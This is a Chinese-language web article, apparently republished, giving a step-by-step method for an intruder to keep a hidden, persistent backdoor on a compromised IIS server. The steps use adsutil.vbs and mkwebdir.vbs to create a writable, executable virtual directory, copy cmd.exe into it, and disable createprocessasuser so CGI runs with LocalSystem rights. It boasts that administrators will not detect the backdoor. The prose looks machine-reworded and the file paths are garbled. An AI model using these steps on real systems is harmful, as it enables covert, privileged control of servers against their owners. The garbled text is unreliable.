真实的IIS永久的后门解密脚本之家alibaba - 超凡娱乐

真实的IIS永久的后门解密脚本之家alibaba

2019-02-01 07:49:54 | 作者: 飞兰 | 标签: 后门,端口,管理员 | 浏览: 7561

IIS是比较盛行的www服务器,设置不妥缝隙就许多。侵略iis服务器后留下后门,今后就能够随时操控。一般的后门程序都是翻开一个特别的端口来监听,比方有nc,ntlm,rnc等等都是以一品种telnet的方法在服务器端监听长途的衔接操控。不过一个比较防备紧密的www站点(他们的管理员吃了苦头后)一般经过防火墙对端口进行约束,这样除了管理员开的端口外,其他端口就不能衔接了。可是80端口是不或许封闭的(假如管理员没有吃错药)。那么咱们能够经过在80端口留后门,来敞开永久的后门。   当IIS发动CGI应用程序时,缺省用CreateProcessAsUser API来创立该CGI的新Process,该程序的安全上下文就由发动该CGI的用户决议。一般匿名用户都映射到IUSR_computername这个账号,当然能够由管理员改为其他的用户。或许由浏览器供给一个合法的用户。两者的用户的权限都是比较低,或许都归于guest组的成员。其实咱们能够修正iis敞开CGI的方法,来进步权限。咱们来看iis主进程自身是运转在localsystem账号下的,所以咱们就能够得到最高localsystem的权限。   侵略web服务器后,一般都能够绑定一个cmd到一个端口来长途操控该服务器。这时能够有GUI的长途操控,比方3389,或许类telnet text方法的操控,比方rnc。nc肯定是能够用的,其实这也足够了。   1. telnet到服务器   2. cscript.exe adsutil.vbs enum w3svc/1/root KeyType : (STRING) "IIsWebVirtualDir"
AppRoot : (STRING) "/LM/W3SVC/1/ROOT"
AppFriendlyName : (STRING) "默许应用程序"
AppIsolated : (INTEGER) 2
AccessRead : (BOOLEAN) True
AccessWrite : (BOOLEAN) False
AccessExecute : (BOOLEAN) False
AccessScript : (BOOLEAN) True
AccessSource : (BOOLEAN) False
AccessNoRemoteRead : (BOOLEAN) False
AccessNoRemoteWrite : (BOOLEAN) False
AccessNoRemoteExecute : (BOOLEAN) False
AccessNoRemoteScript : (BOOLEAN) False
HttpErrors : (LIST) (32 Items)
"400,*,FILE,C:WINNThelpiisHelpcommon400.htm"
"401,1,FILE,C:WINNThelpiisHelpcommon401-1.htm"
"401,2,FILE,C:WINNThelpiisHelpcommon401-2.htm"
"401,3,FILE,C:WINNThelpiisHelpcommon401-3.htm"
"401,4,FILE,C:WINNThelpiisHelpcommon401-4.htm"
"401,5,FILE,C:WINNThelpiisHelpcommon401-5.htm"
"403,1,FILE,C:WINNThelpiisHelpcommon403-1.htm"
"403,2,FILE,C:WINNThelpiisHelpcommon403-2.htm"
"403,3,FILE,C:WINNThelpiisHelpcommon403-3.htm"
"403,4,FILE,C:WINNThelpiisHelpcommon403-4.htm"
"403,5,FILE,C:WINNThelpiisHelpcommon403-5.htm"
"403,6,FILE,C:WINNThelpiisHelpcommon403-6.htm"
"403,7,FILE,C:WINNThelpiisHelpcommon403-7.htm"
"403,8,FILE,C:WINNThelpiisHelpcommon403-8.htm"
"403,9,FILE,C:WINNThelpiisHelpcommon403-9.htm"
"403,10,FILE,C:WINNThelpiisHelpcommon403-10.htm"
"403,11,FILE,C:WINNThelpiisHelpcommon403-11.htm"
"403,12,FILE,C:WINNThelpiisHelpcommon403-12.htm"
"403,13,FILE,C:WINNThelpiisHelpcommon403-13.htm"
"403,15,FILE,C:WINNThelpiisHelpcommon403-15.htm"
"403,16,FILE,C:WINNThelpiisHelpcommon403-16.htm"
"403,17,FILE,C:WINNThelpiisHelpcommon403-17.htm"
"404,*,FILE,C:WINNThelpiisHelpcommon404b.htm"
"405,*,FILE,C:WINNThelpiisHelpcommon405.htm"
"406,*,FILE,C:WINNThelpiisHelpcommon406.htm"
"407,*,FILE,C:WINNThelpiisHelpcommon407.htm"
"412,*,FILE,C:WINNThelpiisHelpcommon412.htm"
"414,*,FILE,C:WINNThelpiisHelpcommon414.htm"
"500,12,FILE,C:WINNThelpiisHelpcommon500-12.htm"
"500,13,FILE,C:WINNThelpiisHelpcommon500-13.htm"
"500,15,FILE,C:WINNThelpiisHelpcommon500-15.htm"
"500,100,URL,/iisHelp/common/500-100.asp" FrontPageWeb : (BOOLEAN) True
Path : (STRING) "c:inetpubwwwroot"
AccessFlags : (INTEGER) 513
[/w3svc/1/root/localstart.asp]
[/w3svc/1/root/_vti_pvt]
[/w3svc/1/root/_vti_log]
[/w3svc/1/root/_private]
[/w3svc/1/root/_vti_txt]
[/w3svc/1/root/_vti_script]
[/w3svc/1/root/_vti_cnf]
[/w3svc/1/root/_vti_bin]   不要告诉我你不知道上面的输出是什么!!!!   现在咱们心里现已有底了,是不是!呵呵 管理员要倒运了
  3. mkdir c:inetpubwwwrootdir1
  4. cscript.exe mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "Virtual Dir1","c:inetpubwwwrootdir1"   这样就建好了一个虚目录:Virtual Dir1   你能够用 1 的指令看一下   5. 接下来要改动一下Virtual Dir1的特点为execute   cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accesswrite "true" -s:
  cscript.exe adsutil.vbs set w3svc/1/root/Virtual Dir1/accessexecute "true" -s:   现在你现已能够upload 内容到该目录,而且能够运转。你也能够把cmd.exe net.exe直接拷贝到虚拟目录的磁盘目录中。   6. 以下指令经过修正iis metabase 来迫使iis以自身的安全环境来创立新的CGI process   Cscript adsutil.vbs set /w3svc/1/root/[your directory]/createprocessasuser false   注释:cscript windows script host.   adsutil.vbs windows iis administration script   后边是 iis metabase path   这样的后门几乎是无法查出来的,除非把一切的虚目录观察一遍(假如管理员写好了遗书,那他就去查吧)

版权声明
本文来源于网络,版权归原作者所有,其内容与观点不代表超凡娱乐立场。转载文章仅为传播更有价值的信息,如采编人员采编有误或者版权原因,请与我们联系,我们核实后立即修改或删除。

猜您喜欢的文章